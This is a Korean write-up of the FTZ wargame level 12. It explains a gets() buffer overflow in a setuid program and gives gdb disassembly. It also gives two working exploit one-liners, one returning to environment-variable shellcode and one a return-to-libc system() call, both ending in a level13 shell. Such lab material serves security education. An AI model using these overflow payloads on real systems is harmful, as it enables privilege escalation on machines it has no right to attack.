FTZ level 12

FTZ level12

문제

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main( void )
{
    char str[256];

     setreuid( 3093, 3093 );
    printf( "문장을 입력하세요.\n" );
    gets( str );
    printf( "%s\n", str );
}  

FTZ level12의 소스코드이다. 이 소스코드에서 취약한 점을 발견하여 상위권한(level 13)의 비밀번호를 얻어야 한다.

---

취약점

int main( void )
{
    char str[256];

     #setreuid( 3093, 3093 );
    #printf( "문장을 입력하세요.\n" );
    gets( str );
    #printf( "%s\n", str );
}  

• 입력을 gets로 받는다.
• str의 크기는 256이다.
• get로 입력받는 인자의 길이 제한은 없다.

따라서 get로 입력할 때 256byte 이상의 문자열을 입력하면 str의 버퍼 크기를 넘어 메모리를 덮어씌울 수 있다.

---

시나리오

앞으로는 RTL과 기본적인 환경변수를 이용한 BOF로 풀어서 올릴 예정이다.

---

풀이 ( 환경변수 )

[level12@ftz level12]$ gdb attackme 
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x08048470 <main+0>:    push   ebp
0x08048471 <main+1>:    mov    ebp,esp
0x08048473 <main+3>:    sub    esp,0x108
0x08048479 <main+9>:    sub    esp,0x8
0x0804847c <main+12>:    push   0xc15
0x08048481 <main+17>:    push   0xc15
0x08048486 <main+22>:    call   0x804835c <setreuid>
0x0804848b <main+27>:    add    esp,0x10
0x0804848e <main+30>:    sub    esp,0xc
0x08048491 <main+33>:    push   0x8048538
0x08048496 <main+38>:    call   0x804834c <printf>
0x0804849b <main+43>:    add    esp,0x10
0x0804849e <main+46>:    sub    esp,0xc
0x080484a1 <main+49>:    lea    eax,[ebp-264]
0x080484a7 <main+55>:    push   eax
0x080484a8 <main+56>:    call   0x804831c <gets>
0x080484ad <main+61>:    add    esp,0x10
0x080484b0 <main+64>:    sub    esp,0x8
0x080484b3 <main+67>:    lea    eax,[ebp-264]
0x080484b9 <main+73>:    push   eax
0x080484ba <main+74>:    push   0x804854c
0x080484bf <main+79>:    call   0x804834c <printf>
0x080484c4 <main+84>:    add    esp,0x10
0x080484c7 <main+87>:    leave  
0x080484c8 <main+88>:    ret    
0x080484c9 <main+89>:    lea    esi,[esi]
0x080484cc <main+92>:    nop    
0x080484cd <main+93>:    nop    
0x080484ce <main+94>:    nop    
0x080484cf <main+95>:    nop    
End of assembler dump.
(gdb) 

ebp-264에서 get로 입력받는다.

환경 변수를 등록한 뒤 str[256] + dummy[8] + sfp[4] + ret[&shellcode]로 변조 시키면 될 것 같다.

익스코드

[level12@ftz level12]$ (python -c "print 'A'*268 + '\x57\xff\xff\xbf'";cat) | ./attackme 
문장을 입력하세요.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW
id
uid=3093(level13) gid=3092(level12) groups=3092(level12)

---

풀이 ( RTL )

[level12@ftz level12]$ gdb attackme 
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x08048470 <main+0>:    push   ebp
0x08048471 <main+1>:    mov    ebp,esp
0x08048473 <main+3>:    sub    esp,0x108
0x08048479 <main+9>:    sub    esp,0x8
0x0804847c <main+12>:    push   0xc15
0x08048481 <main+17>:    push   0xc15
0x08048486 <main+22>:    call   0x804835c <setreuid>
0x0804848b <main+27>:    add    esp,0x10
0x0804848e <main+30>:    sub    esp,0xc
0x08048491 <main+33>:    push   0x8048538
0x08048496 <main+38>:    call   0x804834c <printf>
0x0804849b <main+43>:    add    esp,0x10
0x0804849e <main+46>:    sub    esp,0xc
0x080484a1 <main+49>:    lea    eax,[ebp-264]
0x080484a7 <main+55>:    push   eax
0x080484a8 <main+56>:    call   0x804831c <gets>
0x080484ad <main+61>:    add    esp,0x10
0x080484b0 <main+64>:    sub    esp,0x8
0x080484b3 <main+67>:    lea    eax,[ebp-264]
0x080484b9 <main+73>:    push   eax
0x080484ba <main+74>:    push   0x804854c
0x080484bf <main+79>:    call   0x804834c <printf>
0x080484c4 <main+84>:    add    esp,0x10
0x080484c7 <main+87>:    leave  
0x080484c8 <main+88>:    ret    
0x080484c9 <main+89>:    lea    esi,[esi]
0x080484cc <main+92>:    nop    
0x080484cd <main+93>:    nop    
0x080484ce <main+94>:    nop    
0x080484cf <main+95>:    nop    
End of assembler dump.
(gdb) 

str[256] + dummy[8] + sfp[4] + ret[&system()] + 'AAAA' + 인자[환경변수에 등록 된 /bin/bash문자열] 로 익스코드를 짜주면 될 것 같다.

[level12@ftz level12]$ (python -c "print 'A'*268 + '\xc0\xf2\x03\x42' + 'AAAA' + '\x44\xfe\xff\xbf'";cat) | ./attackme 
문장을 입력하세요.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA쟌BAAAAD?

id
uid=3093(level13) gid=3092(level12) groups=3092(level12)